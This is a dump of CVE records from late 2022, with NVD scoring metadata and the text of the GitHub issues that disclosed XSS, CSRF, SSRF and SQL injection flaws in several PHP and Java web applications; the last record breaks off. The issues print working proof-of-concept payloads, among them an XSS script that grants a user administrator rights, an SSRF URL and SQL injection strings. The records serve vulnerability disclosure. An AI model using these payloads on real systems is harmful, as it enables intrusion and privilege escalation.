[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tribalsystems:zenario:9.3.57186:*:*:*:*:*:*:*", "matchCriteriaId": "8CA17362-D750-47F4-AEDA-5A98A74319AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "hieuminhnv", "Zenario-CMS-last-version" ]
**Summary** hi team, I found Stored XSS in Nest library **Info** Zenario 9.3.57186 last version FireFox 105.0.3 (64-bit) **Steps** Login to account http://xxx.xxx.x.x/admin.php? ![image](https://user-images.githubusercontent.com/28292732/196255776-81eda3d5-f142-43b5-b3ac-f136c4e91281.png) in **Menu** >> **Modules** >> **Nest library** >> **Edit nest's plugins** click in **Banner** >> **Edit plugin** >> inject payload to **Description** ![image](https://user-images.githubusercontent.com/28292732/196257249-be4ddd05-cab7-42f2-a33b-5554fddc0cf0.png) payload executed
Stored XSS in Nest library
https://api.github.com/repos/hieuminhnv/Zenario-CMS-last-version/issues/4/comments
0
2022-10-17T18:44:22Z
2023-02-09T17:45:41Z
https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/4
1,412,045,809
4
4,395
CVE-2022-44070
2022-11-16T16:15:10.873
Zenario CMS 9.3.57186 is vulnerable to Cross Site Scripting (XSS) via News articles.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tribalsystems:zenario:9.3.57186:*:*:*:*:*:*:*", "matchCriteriaId": "8CA17362-D750-47F4-AEDA-5A98A74319AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "hieuminhnv", "Zenario-CMS-last-version" ]
**Summary** hi team, I found small Stored XSS **Info** Zenario 9.3.57186 last version FireFox 105.0.3 (64-bit) ![image](https://user-images.githubusercontent.com/28292732/196246426-2f5cdb9d-2583-4924-ae44-9f401765f7c5.png) **Steps** Login to account http://xxx.xxx.x.x/admin.php? ![image](https://user-images.githubusercontent.com/28292732/196246815-40dce6f4-7c70-412f-bb1b-e81add1e8bba.png) in tab Menu, choose **News articles** Click **New News articles** >> in tab **Meta Data** inject code into **Summary** and tab **Main content** >> save ![image](https://user-images.githubusercontent.com/28292732/196248077-ee636416-6abc-4ed2-99fc-1b16472d4043.png) ![image](https://user-images.githubusercontent.com/28292732/196248297-72a61c86-b3ec-4a54-b492-6876aa010065.png) ![image](https://user-images.githubusercontent.com/28292732/196248912-a1b6fccb-caee-4a7d-b277-c2118933a2ee.png) **payload:** <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" `AllowScriptAccess="always"></EMBED>
Stored XSS in News articles
https://api.github.com/repos/hieuminhnv/Zenario-CMS-last-version/issues/3/comments
0
2022-10-17T18:21:59Z
2023-02-09T17:46:11Z
https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/3
1,412,017,648
3
4,396
CVE-2022-44071
2022-11-16T16:15:11.250
Zenario CMS 9.3.57186 is is vulnerable to Cross Site Scripting (XSS) via profile.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tribalsystems:zenario:9.3.57186:*:*:*:*:*:*:*", "matchCriteriaId": "8CA17362-D750-47F4-AEDA-5A98A74319AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/5
[ "Exploit", "Third Party Advisory" ]
github.com
[ "hieuminhnv", "Zenario-CMS-last-version" ]
**Summary** hi team, I found Stored XSS in profile **Info** Zenario 9.3.57186 last version FireFox 105.0.3 (64-bit) **Steps** Login to account http://xxx.xxx.x.x/admin.php? in profile , at **First name** and **Last name** fill in payload >> save ![image](https://user-images.githubusercontent.com/28292732/196266017-e4a01d15-a07d-40b9-b995-f76f2bf18f4e.png) in tab bar click **View site diagnostics** ![image](https://user-images.githubusercontent.com/28292732/196266423-da8207ac-3979-4f31-97f5-b09dca014ebc.png) Alert executed ![image](https://user-images.githubusercontent.com/28292732/196266591-860f7ad3-56e0-44a8-9217-5629ec266930.png)
Stored XSS in profile
https://api.github.com/repos/hieuminhnv/Zenario-CMS-last-version/issues/5/comments
0
2022-10-17T19:36:59Z
2023-02-09T17:45:24Z
https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/5
1,412,111,219
5
4,397
CVE-2022-44073
2022-11-16T16:15:11.597
Zenario CMS 9.3.57186 is vulnerable to Cross Site Scripting (XSS) via svg,Users & Contacts.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tribalsystems:zenario:9.3.57186:*:*:*:*:*:*:*", "matchCriteriaId": "8CA17362-D750-47F4-AEDA-5A98A74319AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/6
[ "Exploit", "Third Party Advisory" ]
github.com
[ "hieuminhnv", "Zenario-CMS-last-version" ]
**Summary** hi team, I found Stored XSS in upload file svg version 9.0.54156 reported the vulnerability with CVE-2021-41952, in version 9.3.57186 i have bypassed it visit : https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/1 to view my report **Info** Zenario 9.3.57186 last version FireFox 105.0.3 (64-bit) Chrome 106.0.5249.119 _**I will recreate it again**_ **Steps** 1. Login home page >> Choose **Users & Contacts** and create any user 2. Click **Image** >> Upload an image ![image](https://user-images.githubusercontent.com/28292732/196334647-6b6cf269-048f-4ce8-923d-cb3271f8e6cd.png) 3. payload i inject to svg ![image](https://user-images.githubusercontent.com/28292732/196340657-9a71809d-4dd0-4632-9d84-95a704f451cf.png) 4. go to link file inject , paypload executed ![image](https://user-images.githubusercontent.com/28292732/196340390-10e5e098-f4af-477f-b6af-377b83bbb6f4.png)
XSS upload file SVG in Zenario 9.3.57186
https://api.github.com/repos/hieuminhnv/Zenario-CMS-last-version/issues/6/comments
0
2022-10-18T05:14:47Z
2023-02-09T17:45:32Z
https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/6
1,412,584,959
6
4,398
CVE-2022-42187
2022-11-17T04:15:10.950
Hustoj 22.09.22 has a XSS Vulnerability in /admin/problem_judge.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zhblue/hustoj/issues/866" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zhblue/hustoj/issues/866" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hustoj:hustoj:22.09.22:*:*:*:*:*:*:*", "matchCriteriaId": "7F9D317C-8136-4514-8E07-250E38E47B48", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/zhblue/hustoj/issues/866
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zhblue", "hustoj" ]
**描述问题** XSS Vulnerability exists in https://github.com/zhblue/hustoj/blob/417173dd9b4606251e06e1b9a2e6992db58831a8/trunk/web/admin/problem_judge.php#L138 **如何复现** Steps to reproduce the behavior: 1. POST text with xss script to submit.php for example: ```html id=-1000&language=1&source=asdasdasdasdasd&input_text=<script src="/template/bs3/jquery.min.js"></script><script>$.get("/admin/privilege_add.php").done(function(data){ re=/name="postkey" value="([\w]%2B?)"/g; $.post("/admin/privilege_add.php",{"postkey":re.exec(data)[1],"user_id":"username","rightstr":"administrator","valuestr":"true" ,"do":"do","do":"do","csrf":"tV8EG8W5AsFY0JCKoBStoHC2v30NrDe5"}).done(function (data) {console.log(data)}) }) </script> ``` Then you can get a sid. ![image](https://user-images.githubusercontent.com/80891898/192952908-f04f3fc4-5b47-4b32-b0ef-1394d1776cf8.png) 2. Send malicious links to administrators example: ```html <body> <script type="text/javascript"> function post(URL, PARAMS) { var temp = document.createElement("form"); temp.action = URL; temp.method = "post"; temp.style.display = "none"; for (var x in PARAMS) { var opt = document.createElement("textarea"); opt.name = x; opt.value = PARAMS[x]; temp.appendChild(opt); } document.body.appendChild(temp); temp.submit(); return temp; } post("http://192.168.0.25:8080/admin/problem_judge.php",{"sid":"1018","pid":"1000","result":"4","time":"500","memory":"1024","sim":"100","simid":"0","filename":"1000%2Ftest.in","gettestdatalist":"do","getcustominput":"1"}) </script> </body> ``` ![image](https://user-images.githubusercontent.com/80891898/192952743-f9332657-f0c8-44ee-bcbb-e46e806f8031.png)
XSS Vulnerability in /admin/problem_judge.php
https://api.github.com/repos/zhblue/hustoj/issues/866/comments
6
2022-09-29T06:19:47Z
2022-09-30T11:20:38Z
https://github.com/zhblue/hustoj/issues/866
1,390,317,684
866
4,399
CVE-2022-42246
2022-11-17T04:15:11.103
Doufox 0.0.4 contains a CSRF vulnerability that can add system administrator account.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/farliy-hacker/Doufoxcms/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/farliy-hacker/Doufoxcms/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:duofoxtechnologies:duofox_cms:0.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "1D7C3797-3604-4170-BAB9-A9057BD7C09A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/farliy-hacker/Doufoxcms/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "farliy-hacker", "Doufoxcms" ]
After the administrator logs in, open the following page poc: add.html---add a user CSRF link: https://github.com/farliy-hacker/Doufoxcms/blob/main/CSRF-poc
CSRF vulnerability adding system administrator account
https://api.github.com/repos/farliy-hacker/Doufoxcms/issues/1/comments
0
2022-10-02T06:34:06Z
2022-10-02T07:28:16Z
https://github.com/farliy-hacker/Doufoxcms/issues/1
1,393,660,763
1
4,400
CVE-2022-43140
2022-11-17T17:15:13.613
kkFileView v4.1.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. This vulnerability allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the url parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kekingcn/kkFileView/issues/392" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kekingcn/kkFileView/issues/392" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "3CF7B3A0-ACE8-4EF5-AF51-760E7B2650BF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/kekingcn/kkFileView/issues/392
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kekingcn", "kkFileView" ]
问题描述 kkFileview v4.1.0存在SSRF漏洞,攻击者可以利用此漏洞造成服务器端请求伪造(SSRF),远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求。 Description kkFileview v4.1.0 has an SSRF vulnerability, This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF),allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter. 漏洞位置 cn.keking.web.controller.OnlinePreviewController#getCorsFile,"urlPath"参数用户可控,且没有过滤特殊字符就进行请求访问 vulerable code location The vulnerability code iscn.keking.web.controller.OnlinePreviewController#getCorsFile , The 'urlPath' parameter is user-controllable, and request access without filtering special characters ``` @GetMapping("/getCorsFile") public void getCorsFile(String urlPath, HttpServletResponse response) { try { urlPath = WebUtils.decodeBase64String(urlPath); } catch (Exception ex) { logger.error(String.format(BASE64_DECODE_ERROR_MSG, urlPath),ex); return; } if (urlPath.toLowerCase().startsWith("file:") || urlPath.toLowerCase().startsWith("file%3") || !urlPath.toLowerCase().startsWith("http")) { logger.info("异常,可能存在非法访问,urlPath:{}", urlPath); return; } logger.info("下载跨域pdf文件url:{}", urlPath); try { URL url = WebUtils.normalizedURL(urlPath); byte[] bytes = NetUtil.downloadBytes(url.toString()); IOUtils.write(bytes, response.getOutputStream()); } catch (IOException | GalimatiasParseException e) { logger.error("下载跨域pdf文件异常,url:{}", urlPath, e); } } ``` 漏洞证明PoC 官方演示站点为最新4.1.0版本,以此为演示,访问漏洞位置(urlPath参数值需要经过base64编码): https://file.keking.cn/getCorsFile?urlPath=aHR0cDovL3JlbW90ZS5ndGNoZWcuZG5zbG9nLmNu The official demo site is the latest version 4.1.0. Take this as a demo to access the vulnerability location (the urlPath parameter value needs to be Base64 encoded): https://file.keking.cn/getCorsFile?urlPath=aHR0cDovL3JlbW90ZS5ndGNoZWcuZG5zbG9nLmNu dnslog成功收到请求 ![image](https://user-images.githubusercontent.com/73013511/194701270-c0426d6c-5739-49e2-899d-cb4a7abb3501.png) Dnslog successfully received the request ![image](https://user-images.githubusercontent.com/73013511/194701276-c24ff1cc-9acb-4a65-8e44-d3326e7deb0f.png) 修复建议:限制请求文件后缀名为pdf Repair suggestion: limit the request file suffix to pdf
kkFileView SSRF Vulnerability
https://api.github.com/repos/kekingcn/kkFileView/issues/392/comments
1
2022-10-08T09:46:30Z
2022-12-28T06:46:56Z
https://github.com/kekingcn/kkFileView/issues/392
1,401,891,198
392
4,401
CVE-2022-4051
2022-11-17T17:15:13.847
A vulnerability has been found in Hostel Searching Project and classified as critical. This vulnerability affects unknown code of the file view-property.php. The manipulation of the argument property_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-213844.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/itzmehedi/Hostel-searching-project-using-PHP-Mysql/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.213844" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/itzmehedi/Hostel-searching-project-using-PHP-Mysql/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.213844" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hostel_searching_project:hostel_searching_project:-:*:*:*:*:*:*:*", "matchCriteriaId": "F0F144D3-06A9-4B8B-A620-34516045F514", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/itzmehedi/Hostel-searching-project-using-PHP-Mysql/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "itzmehedi", "Hostel-searching-project-using-PHP-Mysql" ]
# SQL injection vulnerability exists in Hostel searching project ## 1.Build environment Aapche2.4.39; MySQL5.7.26; PHP8.0.2 ## 2.Vulnerability analysis ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1117sqldaima.png) view-property.php: property_ ID is assigned to $property_ The ID variable is then brought into the database for query, and the query result is returned. During this process, the property_ The ID is brought into the database without being filtered, thus creating a SQL injection vulnerability * We can use sqlmap to validate ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/sqlmap1117.png) * Manual SQL injection proof ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1117wangyesql.png) ## 3.POC ``` http://127.0.0.1/view-property.php?property_id=127' or (select 1 from(select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and 'ace'='ace ```
SQL injection vulnerability exists in Hostel searching project
https://api.github.com/repos/iammehedi1/Hostel-searching-project-using-PHP-Mysql/issues/1/comments
0
2022-11-17T05:51:46Z
2022-11-18T12:00:14Z
https://github.com/iammehedi1/Hostel-searching-project-using-PHP-Mysql/issues/1
1,452,754,200
1
4,402
CVE-2022-4052
2022-11-17T17:15:14.193
A vulnerability was found in Student Attendance Management System and classified as critical. This issue affects some unknown processing of the file /Admin/createClass.php. The manipulation of the argument Id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-213845 was assigned to this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rickxy/Student-Attendance-Management-System/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.213845" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rickxy/Student-Attendance-Management-System/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.213845" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:student_attendance_management_system_project:student_attendance_management_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "A049D780-8ACB-4734-A45C-AE7EE194690C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/rickxy/Student-Attendance-Management-System/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rickxy", "Student-Attendance-Management-System" ]
Build environment: Aapche2.4.39; MySQL5.7.26; PHP7.3.4 SQL injection vulnerability in Student Attendance Management System。input admin@mail.com / Password@123 Log in to the background. Then modify the information in createClass Php, the ID is assigned to the variable $ID, and then inserted into the database for query, and the query information is returned, causing a SQL injection vulnerability ## 2.sql injectionPOC: ```php http://127.0.0.1/Admin/createClass.php?action=edit&Id=2' AND (SELECT 5892 FROM (SELECT(SLEEP(5)))cbkc) AND 'Popu'='Popu--- ``` * Use sqlmap to verify ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/studentsql.png) * Manual verification 1. SLEEP(5) ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/11175s.png) 2. SLEEP(8) ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/11178s.png)
SQL injection vulnerability in Student Attendance Management System
https://api.github.com/repos/rickxy/Student-Attendance-Management-System/issues/2/comments
0
2022-11-17T06:51:39Z
2022-11-18T00:12:23Z
https://github.com/rickxy/Student-Attendance-Management-System/issues/2
1,452,812,879
2
4,403
CVE-2022-4053
2022-11-17T17:15:14.467
A vulnerability was found in Student Attendance Management System. It has been classified as problematic. Affected is an unknown function of the file createClass.php. The manipulation of the argument className leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-213846 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.4, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rickxy/Student-Attendance-Management-System/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.213846" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rickxy/Student-Attendance-Management-System/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.213846" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:student_attendance_management_system_project:student_attendance_management_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "A049D780-8ACB-4734-A45C-AE7EE194690C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/rickxy/Student-Attendance-Management-System/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
